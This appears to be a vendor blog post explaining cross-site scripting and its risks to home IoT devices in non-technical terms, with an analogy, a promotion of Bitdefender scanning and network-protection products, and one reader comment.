Understanding IoT Vulnerabilities: Code Injection Attacks Can Steal Your Web Life

Of the many methods hackers can use, they will go with the simplest ones when they can. They won’t bother with complicated hacks into systems or web infrastructures when insufficient code checks and misdirection allow them to run malicious scripts.

Cross-site scripting, or XSS, is a web-based vulnerability that an attacker can use to add dangerous code to a link that is otherwise benign. Clicking the link sends the legitimate website both the harmless request and the malicious script. The website issues a response to the original request, and includes the attacker’s script, which is executed by the local web browser because it comes from a trusted source. A successful XSS attack triggers no alarm to the user and could result in hijacked web accounts, stolen web sessions, control of the browser remotely, or redirection to malicious locations. But the impact is not limited to these.

As an analogy of XSS with a real-world scenario, say Bob the manager tells Mark, his assistant, to bring him a document outlining employee payments for the month. Unknown to the manager, Mark created the document and added a 20% bonus for himself. Bob signs the paper without checking it, and tells Mark to deliver it to the financial department. When payday comes, Mark gets his “prize” as a result of the employee payment document having been processed without a check for anomalies.

Although some anti-XSS mechanisms have been implemented in web browsers and some add-ons can provide some protection against this type of vulnerability, they do not offer a complete defense. Ultimately, fixing XSS vulnerabilities is a job for web developers building websites and web applications. Despite being a decade old, XSS remains common.

IoT devices. network-attached storage (NAS), routers, DVR systems, IP cameras and smart home hubs are just some of the connected devices where XSS flaws could hide. As far as the IoT world is concerned, a good security standard is often a matter of installing the latest firmware version.

Products like Bitdefender Home Scanner provide details about known vulnerabilities in devices connected to the home network; you can use this information to increase the security of the gadget yourself or to look for a new patch from the vendor that fixes the issues reported.

Active protection for the IoT gadgets in the house is available from Bitdefender BOX, a hardware solution that monitors the traffic on your network for malicious activity. It can recognize redirect requests to suspicious websites or to phishing locations, regardless of the connected gadget that initiates the communication.

One comment

  • By PK - Reply

    This keeps happening to us but we’ve been able to stay in front of it so far.
    It would be great if there were a way to scan for xss.

  • Add Comment

    Your email address will not be published. Required fields are marked *